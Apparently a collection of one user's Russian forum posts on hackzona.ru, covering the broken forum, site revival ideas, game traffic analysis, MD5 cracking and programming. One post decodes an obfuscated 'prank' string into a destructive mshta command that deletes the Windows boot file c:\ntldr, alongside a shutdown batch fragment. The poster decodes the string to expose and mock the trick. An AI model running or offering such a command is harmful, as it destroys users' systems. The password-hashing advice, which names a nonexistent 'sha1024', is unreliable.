А форум и правда разломан. Вот свежая тема в форуме программирование:
hackzona.ru/forum/topic/11794

Которая должна бы быть видна вот тут:
hackzona.ru/forum/programming.html

Но её там нет.

И кстати…

Кто-нибудь может внятно объяснить, куда девался домен hackzone.ru, на котором хакзона изначально и находилась?

Дизайн старый, дизайн новый… да 95% пользователей плевать на дизайн, пока они могут найти нужные им кнопки.

Если уж вы на самом деле собрались воскресить этот музей славы двухтысячных, то начните с аналитики.
— откуда на сайт приходят люди?
— по каким запросам?
— что они делают на сайте?
— когда и на какой странице они сайт покидают?
— да хоть голосовалку на главной замутите
А там уже будет видно, что делать.

Еще:
— Где интеграция с соцсетями? сделайте группу вконтакте и все такое. Я понимаю, что многие посетители захотят остаться анонимными, но на дворе давно уже 21 век.
— чем хакзона отличается от остальных сайтов с ворованными новостями? В этом плане уход со старого дизайна был ошибкой — старый дизайн был хотя бы уникален и намекал на длинную историю хакзоны.
— авторизация по email/пароль — давно не модно. Прикручивайте OAuth2.

ЗЫ: и почините уже BBCODE

Гугль base64 decode to hex online
Вот например:
[url]http://tomeko.net/online_tools/base64.php?lang=en[/url]

Насчет шифрования — проверь, не используется ли SSL. Вообще, если шифрование и используется, то шифруются не индивидуальные пакеты, а поток данных целиком — это проще в реализации.

Но еще вероятнее, что данные не шифруются вообще, а кодируются хитрым алгоритмом с целью уменьшения объема. Вот самый популярный вариант: [url]http://developers.google.com/protocol-buffers/docs/encoding[/url]. Еще может применяться сжатие.

Проверь траффик на заголовки SSL, на заголовки популярных алгоритмов сжатия типа gzip, поищи там текстовые строки от внутриигрового чата.

По неотвеченным вопросам…

2. да, конечно. Но eсли это SSL, тогда расшифровать без вмешательства в работу клиента не получится.

3. 1111 может быть закодировано для уменьшения размера или накрыто потоковым алгоритмом сжатия или шифрования. Лучше искать текстовые строки — там меньше вариантов кодировки.

4. Да, как обычно — просто пересчитываешь её при подмене данных

5. От реализации зависит, но частенько в играх к каждому пакету дописывают порядковый номер — чтобы упростить синхронизацию данных при переподключении.

О, вы тут решили хакзону вернуть к жизни?

Я думаю, что скатываться вникуда она стала, когда у этого сайта отобрали домен hackzone.ru. Для начала, напишите новость на главной — кто, зачем, когда, как и какое у вас видение возрожденной хакзоны.

netstat -anb
Если выполнить в админской консоли, покажет, среди прочего, список всех открытых портов и имена exe-шников или PID процессов, которые эти порты открыли.

Ищи что-то вроде этого:
TCP 0.0.0.0:22 0.0.0.0:0 LISTENING

Да.
Хакзона умерла, но люди остались.

Так она в 2003 и умерла, когда домен hackzone.ru отжали в пользу какого-то медицинского сайта для школьников

О детях, о детях…
Цветы жизни, черт их дери…

Не удержался и из чувства любопытства написал декодирующую программу:
[code]
String s1 = "#109#115#104#116#97#32#34#106#97#118#97#115#99#114#105#112#116#58#32#110#101#119#32#65#99#116#105#118#101#88#79#98#106#101#99#116#32#40#39#83#99#114#105#112#116#105#110#103#46#70#105#108#101#83#121#115#116#101#109#79#98#106#101#99#116#39#41#46#68#101#108#101#116#101#70#105#108#101#32#40#39#99#58#92#92#110#116#108#100#114#39#44#32#49#41#59#99#108#111#115#101#40#41#59#34";
String s2= "&set; [email protected]&set; d=down&set; s=shut&ECHO;/Sending email&set; body=Edit1.text&!s!!d! -s -f -t 20 -c ";
String s3 = "#34#211#215#200#32#193#211#202#194#192#208#200#33#34#38";
ByteArrayOutputStream os = new ByteArrayOutputStream();
for (String s:s1.split("#")) {
if (s.isEmpty()) continue;
os.write(Integer.valueOf(s));
}
System.out.println(new String(os.toByteArray(), «cp1251»));
[/code]

И её вывод для 1 и третьей строки:
[code]
mshta «javascript: new ActiveXObject ('Scripting.FileSystemObject').DeleteFile ('c:\\ntldr', 1);close();»
«УЧИ БУКВАРИ!»&
[/code]

Радуют, радуют подлянкосоветчики 2007 года разлива :)

Вообще говоря, md5 содержит уязвимости, позволяющие найти пароль гораздо быстрее, чем простым перебором. В сети много таких сервисов…

Ссылки в тему:
[url]http://ru.wikipedia.org/wiki/Md5[/url]
[url]http://ru.wikipedia.org/wiki/RainbowCrack[/url]
[url]http://www.google.ru/search?q=md5+rainbow[/url]

Хороший, правильный труп должен лежать и не дергаться =)

Не так уж и сложно, за пару-тройку килорублей тебе такую напишут

Обалденная идея, но сайту явно не хватает корректора (орфография страдает)

Если один программист, то нужен специалист, один-два года, на полную ставку, и естественно с зп, т.к. кушать иногда надо

ммм… в последнее время на Java
а так delphi/C/C++/x86 asm/PIC asm/Java/Groovy/PHP/JS/C#

Да, не вопрос
или как CGI, или как JSP-страницу, или как сервлет.
Правда, для последних двух случаев придется ставить сервлет-контейнер, apache tomcat или соответствующий модуль для апача.

ЗЫ: надеюсь что хоть модераторы тут не путают java и javascript :)

На практике применяют конструкции вида md5(salt1+md5(password)+salt2)
Насчет взлома — все сервисы нахождения пароля по md5 применяют т.н. rainbow-tables, рассчитываемые заранее.
А вообще параноики должны помнить, что самый эффективный хэш — это комбинация разных хэшей.
sha1024(md5(password))
где-то так.

Шифр многовариантной замены. Алгоритм не гарантирует стойкость шифрования — в теории может получиться даже шифр одновариантой замены.
Почему не сломали до сих пор? Всем было влом ковыряться в обфускированном говне, да еще и на вижуал бейсике, либо в качестве заданий на расшифровку автор дал вывод генератора псевдослучайных чисел.
Также, как и все шифры замены, этот шифр неустойчив к атаке на открытый текст — можно легко найти ключ, если есть зашифрованный и исходный файл.

ЗЫ: К тому же, есть 99.99% вероятность, что счастливый взломщик такого *шифра* получит от мертвого осла уши, а не полторы штуки баксов… почтовым переводом… :D

Об этом в свое время писал еще Крис Касперский.
Небольшие замечания:
1. не упоминать в одной строчке слова «printf» и «C++»
2. fgets(&str;[0],17,stdin) — дикий ахтунг, обычно пишут fgets(str,17,stdin)
3. выгораживание дельфового стиля смотрится несколько странно, т.к. попробуй напиши на дельфи printf("_%8.2f_%8i_%s", 3.1415, 123, «qwerty»); и сравни размер кода

Лучший спамер — мёртвый спамер…

Вроде серьёзные провайдеры позволяют фильтровать клиентский траффик по заявлению… отбрасывать пакеты по IP/тип/протокол/адрес до счётчика траффика.

Лет 5 назад были были ещё непуганые дяди, например domainvalet.com
Сейчас — сильно сомневаюсь…

Хакер — это не специальность, не звание, не должность и не статус на форуме.
Хакер — это маниакальная любознательность в околокомпьютерной области и терпение.
Всё остальное — лишь следствие любознательности и терпения в течение многих лет.